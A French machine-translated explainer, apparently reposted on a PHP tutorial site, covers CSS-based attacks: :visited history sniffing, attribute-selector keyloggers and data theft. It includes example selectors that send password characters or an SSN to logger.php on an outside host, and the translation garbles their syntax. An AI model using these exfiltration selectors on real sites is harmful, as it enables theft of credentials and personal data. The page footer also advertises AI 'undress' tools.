Ne pas paniquer! Le CSS lui-même n'est pas un risque de sécurité majeur, et dans la plupart des cas, il n'est pas nécessaire de s'inquiéter trop.
Cependant, certains articles discuteront des caractéristiques potentiellement surprenantes et même inquiétantes du CSS. Résumons:
Lier les problèmes qui ont été visités
Le problème est décrit comme suit:
- Il existe un lien sur le site Web vers une page spécifique, comme Tickle Pigs .
- Vous utilisez le style
:visitedpour définir la couleur du lien visité, commea:visited { color: pink; }, qui n'est pas le style d'agent utilisateur par défaut. - Vous testez le style de calcul du lien.
- Si la couleur est rose, cela signifie que l'utilisateur a visité la page.
- Vous signalez ces informations à un serveur et effectuez certaines actions en conséquence (comme l'augmentation du taux de prime d'assurance).
Vous pourriez même le faire avec CSS complètement, car le :visited peut contenir background-image: url(/data-logger/tickle.php); , qui ne sera demandé que par les utilisateurs qui ont visité la page.
Ne t'inquiète pas! Les navigateurs ont bloqué cette attaque.
Clés
Le problème est décrit comme suit:
- Il y a une boîte d'entrée sur la page, probablement une boîte d'entrée de mot de passe.
- Vous prenez un script d'enregistrement comme image d'arrière-plan de la zone d'entrée et ajoutez un grand nombre de sélecteurs pour collecter les informations de mot de passe.
entrée [valeur ^ = "a"] {background: url (logger.php? v = a); }
Ce n'est pas facile à réaliser. value de la zone d'entrée ne changera pas immédiatement en raison de l'entrée utilisateur. Mais dans des cadres comme React, cela se produit parfois. Ainsi, en théorie, ce CSS Keylogger pourrait fonctionner si vous ajoutez ce CSS à une page de connexion construite avec React.
Cependant, dans ce cas, le code JavaScript a été exécuté sur la page. Pour de telles attaques, JavaScript est beaucoup plus dangereux que CSS. Le JavaScript KeyLogger surveille les événements clés et les rapporte via Ajax avec seulement quelques lignes de code.
La politique de sécurité du contenu (CSP) peut bloquer le JavaScript en ligne injecté par des tiers et des XS ... et bien sûr, il peut également bloquer le CSS.
Vol de données
Le problème est décrit comme suit:
- Si je peux ajouter des CSS malveillants à la page du site Web, vous êtes connecté ...
- Et le site Web affiche des informations sensibles, telles qu'un numéro de sécurité sociale (SSN), pré-remplie sous la forme ...
- Je peux l'obtenir avec le sélecteur de propriétés.
entrée # ssn [value = "123-45-6789"] {background: url (https://secret-site.com/logger.php?ssn=123-45-6789); }
Avec un grand nombre de sélecteurs, vous pouvez couvrir toutes les possibilités!
Problème de bloc de style en ligne
Je ne sais pas si cela devrait être blâmé à CSS, mais imaginez:
... insérez un contenu généré par l'utilisateur ...
Peut-être que vous permettez à l'utilisateur de personnaliser certains CSS. Il s'agit d'un vecteur d'attaque car ils peuvent fermer des balises de style, ouvrir des balises de script et écrire du code JavaScript malveillant.
Il y a certainement plus
Y avez-vous pensé? Partagez-le.
Je suis sceptique quant au niveau de peur des vulnérabilités de sécurité CSS. Je ne veux pas trop sur les problèmes de sécurité (en particulier les problèmes tiers) parce que je ne suis pas un expert et que la sécurité est cruciale. Mais en même temps, je n'ai jamais entendu parler de CSS de devenir un vecteur d'attaque autre que des expériences de pensée. S'il vous plaît, apprenez-moi!
Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!
Le positionnement de l'ancre ne se soucie pas de l'ordre sourceApr 29, 2025 am 09:37 AMLe fait que le positionnement de l'ancrage évite l'ordre de source HTML est si CSS-y parce qu'il est une autre séparation des préoccupations entre le contenu et la présentation.
Que signifie marge: 40px 100px 120px 80px?Apr 28, 2025 pm 05:31 PML'article traite de la propriété CSS Margin, en particulier "Marge: 40px 100px 120px 80px", son application et les effets sur la mise en page de la page Web.
Quelles sont les différentes propriétés de la frontière CSS?Apr 28, 2025 pm 05:30 PML'article traite des propriétés des frontières CSS, en se concentrant sur la personnalisation, les meilleures pratiques et la réactivité. Argument principal: Border-Radius est le plus efficace pour les conceptions réactives.
Quels sont les arrière-plans CSS, énumérez les propriétés?Apr 28, 2025 pm 05:29 PML'article traite des propriétés de fond CSS, de leurs utilisations dans l'amélioration de la conception du site Web et des erreurs courantes à éviter. L'accent est mis sur la conception réactive en utilisant la taille de l'arrière-plan.
Quelles sont les couleurs CSS HSL?Apr 28, 2025 pm 05:28 PML'article traite des couleurs CSS HSL, de leur utilisation dans la conception Web et des avantages par rapport à RVB. L'objectif principal est d'améliorer la conception et l'accessibilité grâce à une manipulation intuitive des couleurs.
Comment pouvons-nous ajouter des commentaires dans CSS?Apr 28, 2025 pm 05:27 PML'article traite de l'utilisation des commentaires dans CSS, détaillant les syntaxes de commentaires à ligne unique et multi-lignes. Il soutient que les commentaires améliorent la lisibilité, la maintenabilité et la collaboration du code, mais peuvent avoir un impact sur les performances du site Web si elles ne sont pas gérées correctement.
Que sont les sélecteurs CSS?Apr 28, 2025 pm 05:26 PML'article traite des sélecteurs CSS, de leurs types et de l'utilisation pour le style des éléments HTML. Il compare les sélecteurs ID et classe et aborde les problèmes de performances avec des sélecteurs complexes.
Quel type de CSS détient la priorité la plus élevée?Apr 28, 2025 pm 05:25 PML'article traite de la priorité CSS, en se concentrant sur les styles en ligne ayant la plus grande spécificité. Il explique les niveaux de spécificité, les méthodes de remplacement et les outils de débogage pour gérer les conflits CSS.
Outils d'IA chauds
Undresser.AI Undress
Application basée sur l'IA pour créer des photos de nu réalistes
AI Clothes Remover
Outil d'IA en ligne pour supprimer les vêtements des photos.
Undress AI Tool
Images de déshabillage gratuites
Clothoff.io
Dissolvant de vêtements AI
Video Face Swap
Échangez les visages dans n'importe quelle vidéo sans effort grâce à notre outil d'échange de visage AI entièrement gratuit !
Article chaud
Outils chauds
MinGW - GNU minimaliste pour Windows
Ce projet est en cours de migration vers osdn.net/projects/mingw, vous pouvez continuer à nous suivre là-bas. MinGW : un port Windows natif de GNU Compiler Collection (GCC), des bibliothèques d'importation et des fichiers d'en-tête librement distribuables pour la création d'applications Windows natives ; inclut des extensions du runtime MSVC pour prendre en charge la fonctionnalité C99. Tous les logiciels MinGW peuvent fonctionner sur les plates-formes Windows 64 bits.
SublimeText3 version anglaise
Recommandé : version Win, prend en charge les invites de code !
SublimeText3 Linux nouvelle version
Dernière version de SublimeText3 Linux
SublimeText3 version Mac
Logiciel d'édition de code au niveau de Dieu (SublimeText3)
Télécharger la version Mac de l'éditeur Atom
L'éditeur open source le plus populaire
